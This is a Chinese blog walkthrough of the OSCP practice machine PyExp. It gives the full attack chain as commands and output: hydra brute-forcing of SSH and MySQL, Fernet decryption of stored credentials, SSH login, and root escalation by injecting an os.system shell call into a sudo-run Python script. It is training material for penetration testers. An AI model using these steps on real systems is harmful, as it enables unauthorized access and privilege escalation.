OSCP系列靶场-Esay-PyExp保姆级

最新推荐文章于 2024-07-18 16:41:57 发布
最新推荐文章于 2024-07-18 16:41:57 发布
阅读量1.7k 收藏
点赞数
分类专栏: OSCP 文章标签: 安全 网络 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61812944/article/details/132401808
版权

OSCP靶场系列-Esay-PyExp

目录

总结

getwebshell : Mysql端点发现 → 暴力破解root密码 → 利用20w大字典爆破成功→ 进入数据库发现加密信息 → fernet解密得到账号密码 → ssh登录

提 权 思 路 : sudo特权文件发现 → python提权

准备工作

  • 启动VPN
    获取攻击机IP → 192.168.45.194

  • 启动靶机
    获取目标机器IP → 192.168.203.118

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次(多次扫描减少误扫)
sudo nmap --min-rate 10000 -p- 192.168.203.118

PORT     STATE SERVICE
1337/tcp open  waste
3306/tcp open  mysql


开放的端口-→1337,3306

目标端口对应服务探测

# tcp探测
sudo nmap -sT -sV -O -sC -p1337,3306 192.168.203.118

PORT     STATE SERVICE VERSION      
1337/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2     
3306/tcp open  mysql   MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1

信息收集-端口测试

1337-SSH端口的信息收集

1337-SSH端口版本信息与MSF利用

通过Nmap探测获得SSH的版本信息,可以尝试利用
探测版本为OpenSSH 7.9p1 Debian 10+deb10u2 

# 搜索对应脚本
msf6 → searchsploit OpenSSH 7.9p1

1337-SSH协议支持的登录方式

通过Nmap探测获得SSH的版本信息,在获取到某个用户名之后尝试

sudo ssh root @192.168.203.118 -v -p 1337

显示publickeypassword就是支持密钥以及密码登录

1337-SSH手动登录尝试(无)

因为支持密码登录,尝试root账户的密码弱密码尝试

sudo ssh root @192.168.203.118 -p 1337
# 密码尝试
password → root


弱密码尝试失败

1337-SSH弱口令爆破(静静等待)

因为支持密码登录,尝试root账户的密码爆破,利用工具hydra,线程-t为6

sudo hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.203.118 ssh -s 1337

挂着工具进行爆破,我们尝试后续信息收集

3306-Mysql端口的信息收集

3306-Mysql端口的默认脆弱口令测试
# 尝试直接使用mysql协议进行root:root尝试(远程需-h)
mysql -h [目标IP] -u [用户名] -p [密码]
mysql -h 192.168.203.118 -uroot -proot

3306-Mysql端口的默认账号爆破测试
# 尝试hydra爆破mysql中root账户密码
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -vV 192.168.203.118  mysql

尝试爆破发现没有密码,陷入了僵局,决定上大字典

3306-Mysql端口的默认账号爆破测试
# 尝试hydra爆破mysql中root账户密码
hydra -l root -P /usr/share/wordlists/rockyou.txt -t 64 -vV 192.168.203.118  mysql

大字典爆破了很久很久才发现了密码prettywoman

3306-Mysql端口登录

mysql -h 192.168.203.118 -uroot -pprettywoman

3306-Mysql端口的用户信息查找

主要查找登录的账号密码等信息

# 展示数据库
show databases;
# 使用需要查找的数据库
use data;
# 展示表
show tables;


# 寻找我们需要的表,通常名为user、admin
select * from fernet;

发现了加密的credkeyy

cred
gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=
keyy
UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=

通过百度发现表名已经给了提示,加密类型就是fernet
https://cryptography.io/en/latest/fernet/讲解了是如何加密的

# 加载
from cryptography.fernet import Fernet
# 这里输入key
key = Fernet.generate_key()
f = Fernet(key)
# 这里输入密钥
token = f.encrypt(b"my deep dark secret")
# 得到结果
f.decrypt(token)
b'my deep dark secret'

python3

from cryptography.fernet import Fernet
# 这里输入key(报错进行修改)
# key = Fernet.generate_key('UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=')
# 代码里是要生成一个key,这里是我们指定key
key = b'UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0='
f = Fernet(key)
# 这里输入密钥(不对 不用加密)
# token = f.encrypt(b"gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=")
# 直接指定token进行解密
token = b"gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys="
# 得到结果
f.decrypt(token)
# b'my deep dark secret'
b'lucy:wJ9`"Lemdv9[FEw-'

得到了账号和密码的信息

lucy:wJ9`"Lemdv9[FEw-

漏洞利用-getwebshell

获取账号密码之后利用SSH进行登录

sudo ssh lucy @192.168.203.118 -p1337
password → wJ9`"Lemdv9[FEw-

内网遨游-getshell

FLAG1获取

lucy @pyexp:~$ find / -name local.txt 2→/dev/null
/home/lucy/local.txt
lucy @pyexp:~$ cat /home/lucy/local.txt
ebae58ce8fe13bf90c1ac089200656c0

信息收集-内网基础信息收集

提权的本质在于枚举,在获取shell之后我们要进行内网信息的收集,都是为了提权做准备

检测Linux操作系统的发行版本

较老的Ubuntu以及Linux系统可以overlayfs提权

# 确定发行版本
lucy @pyexp:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 10 (buster)
Release:        10
Codename:       buster

发行版本为Debian,不太能overlayfs提权

检测Linux操作系统的内核版本

较低的内核版本可以进行脏牛提权

lucy @pyexp:~$ uname -a
Linux pyexp 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux

内核版本为4.19.0

检测当前用户的权限
lucy @pyexp:~$ id
uid=1000(lucy) gid=1000(lucy) groups=1000(lucy),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
列举出所有的sudo文件

查找具有sudo权限,且不需要密码的可提权文件
如果发现sudo -l有东西的话 访问 https://gtfobins.github.io 寻找

# 利用sudo -l寻找
lucy @pyexp:~$ sudo -l
Matching Defaults entries for lucy on pyexp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucy may run the following commands on pyexp:
    (root) NOPASSWD: /usr/bin/python2 /opt/exp.py

权限提升

sudo权限提升之python

查看了一下可以sudo的文件,可以读

lucy @pyexp:~$ cat /opt/exp.py
uinput = raw_input('how are you?')
exec(uinput)

会执行uinput的内容,执行之后可以在后面输入内容,因为是input

如果发现有东西的话 访问 https://gtfobins.github.io 寻找

# 尝试在后面加上import os; os.system("/bin/sh")
lucy @pyexp:/opt$ sudo /usr/bin/python2 /opt/exp.py
how are you?import os; os.system("/bin/sh")
# id
uid=0(root) gid=0(root) groups=0(root)

提权成功

FLAG2获取

# cat /root/proof.txt
419157ef0f5cab7409e0818499f4bda6

完结撒花~

后记

没想到的点:
数据库中可以通过load_file读取文件,用select load_file('/etc/passwd')

利用hyrda爆破大字典总觉得力不从心,查阅资源发现可以使用medusa进行爆破

杳若听闻
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OSCP靶场1-SolidState(smtp、pop3、james)
墨痕诉清风的博客
04-22 341
注:如果下载文件,通过 python -m http.server 80,进入 /tmp文件夹下载,否则经常出现没有权限。1. 可以看到这是台32位 debian 操作系统,内核版本 Linux 4.9.0,可以进行查找该内核提权漏洞。根据exp解释,当登录任意用户将执行反弹shell,利用了 /etc/bash_completion.d 机制。成功反弹,且因为payload利用的是sh,已经不受限制rbash了。利用ssh登录,但是被rbash限制,非常多的命令不能使用,退出。
OSCP系列靶场-Esay-SunsetDecoy
2301_80115097的博客
04-03 1380
发现zip文件 →zip存在密码 →john爆破zip密码 → 发现passwd与shadow文件 → 爆破shadow密码 →ssh登录提 权 思 路: 发现后台运行程序 → 上传pspy64查看 → 发现chkrootkit→chkrootkit提权当没有思路的时候,可以上传pspy64来尝试发现root下运行的进程声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!免费领取安全学习资料包!
OSCP系列靶场-Esay-Gaara
杳若的博客
08-07 3062
OSCP系列靶场-Esay-Gaara
OSCP系列靶场-Esay-Shakabrah
杳若的博客
08-16 187
OSCP系列靶场-Esay-Shakabrah
OSCP系列靶场-Esay-Sumo
HUANGXIN9898的博客
09-19 177
从发现ssh版本开始就感觉有点偏老,应该多尝试老漏洞有时候nikto工具也可以适当用一下,指不定有其他收获。
OSCP-Human-Guide:我自己的OSCP指南
05-12
OSCP-人类指南 编辑我目前正在将所有OSCP内容和其他内容移动到“ ”中。 该存储库将没有更多更新。 带来不便敬请谅解。 该页面是一些技巧的真实记录,真正的指南是 我自己的OSCP指南,包括一些礼物,我自己制作的和...
OSCP-Cheat-Sheet:更加努力
03-05
【标题】"OSCP-Cheat-Sheet:更加努力"揭示了这个压缩包文件的主要内容,它是一个关于OSCP(Offensive Security Certified Professional)认证的学习备忘单,旨在帮助备考者更有效地准备考试。OSCP网络安全领域的一...
OSCP-Exam-Report-Template-Markdown
04-02
我在Markdown中创建了攻击性安全考试报告模板,因此在进行攻击性安全OSCP,OSWE,OSCE,OSEE,OSWP,OSEP,OSED考试时,不再需要LaTeX,Microsoft Office Word,LibreOffice Writer! 现在,您可以在检查报告编辑...
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
1-OSCP自学笔记-October靶机练习1
08-04
【OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机。靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
OSCP推荐靶场-Stapler
qq_63785498的博客
10-07 218
OSCP推荐靶场-Stapler
OSCP靶场4-HL(命令注入、find提权)
墨痕诉清风的博客
05-06 182
别:初/中Arp-scan或可用于发现租用的 IP 地址。在我的网络上,机器被分配了 IP 地址。让我们使用nmap扫描这台机器。使用nmap的端口扫描显示Apache服务器在端口 80 上运行。这是这台机器上唯一开放的端口,因此我们可以假设我们在这个机器上的立足点将通过一个易受攻击的 Web 应用程序或脚本(因为这是一个毕竟,CTF!)。192.168.10.42 主机的 Nmap 扫描报告已启动(0.0083 秒延迟)。未显示:65534 关闭端口。
类OSCP靶机-Kioptix Level 2
ETO发展中心
08-02 420
同步发布:https://www.youi.xin/?p=449 1.信息收集 环境部署可参考上一篇https://www.youi.xin/?p=435 通过对c段扫描发现了靶机ip,nmap扫描目标端口信息如下: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a.
【OSCP系列】OSCP靶机-Cybersploit2(原创)
最新发布
Lusen的博客
07-18 255
OSCP系列-Cybersploit2靶场记录
OSCP推荐靶场-FristiLeaks
qq_63785498的博客
10-06 425
SetUID(Set User ID)是一种特殊的权限,它允许一个程序在执行时以文件所有者的身份运行,而不是执行者的身份。这样做的效果是,命令的标准输入会与网络套接字的输出连接,从而允许远程计算机发送命令到被攻击者的计算机。: 这个选项指定了发送扫描请求的最小速率,即在扫描中发送数据包的最小速度。: 这是一个I/O重定向操作符,它将一个文件描述符(在这里是标准输出)连接到另一个文件描述符。: 这是Shell程序的名称,它会启动一个新的Shell会话。: 这是Linux系统上的一个用于查找文件和目录的命令。
OSCP靶机----OnSystemShellDredd
qq_53003652的博客
09-13 208
WEB到内网&&FTP匿名&&SSH密钥登录&&SUID提权
OSCP靶场系列-Esay-BBSCute保姆
杳若的博客
07-23 5632
BBSCute保姆靶场流程
靶场实战(12):OSCP备考之VulnHub SEPPUKU
OneMoreThink
01-09 1050
打靶思路资产发现主机发现服务发现(端口、服务、组件、版本)漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)7080端口/HTTPS服务组件漏洞URL漏洞(目录、文件)7601端口/HTTP服务组件漏洞URL漏洞(目录、文件)提升权限seppuku用户sudosuidcron内核提权信息收集samurai用户sudosuidcron内核提...
OSCP靶场7-Assertion(目录穿越、命令执行、aria2c提权)
墨痕诉清风的博客
06-07 263
扫描和枚举我们将从扫描目标机器上的开放端口和服务开始,并记住将结果存储在某个地方以便我们可以返回它。还要记住,最好使用 -p- 标志检查所有端口以防万一。-p- *目标 ip* > nmapPn - 这是告诉 nmap 正在扫描的目标已启动并正在运行,因此不必担心检查是否已启动。sV – 检查端口以确定服务/版本sC – 使用脚本检查漏洞只打开了两个端口,这可能好,也可能不好。以防万一我也运行 udp 扫描。UDP 方面似乎没有什么突出的。查看 http 站点,有一件事引起了我的注意。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全网络渗透感兴趣的读者来说是一个很有价值的参考资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值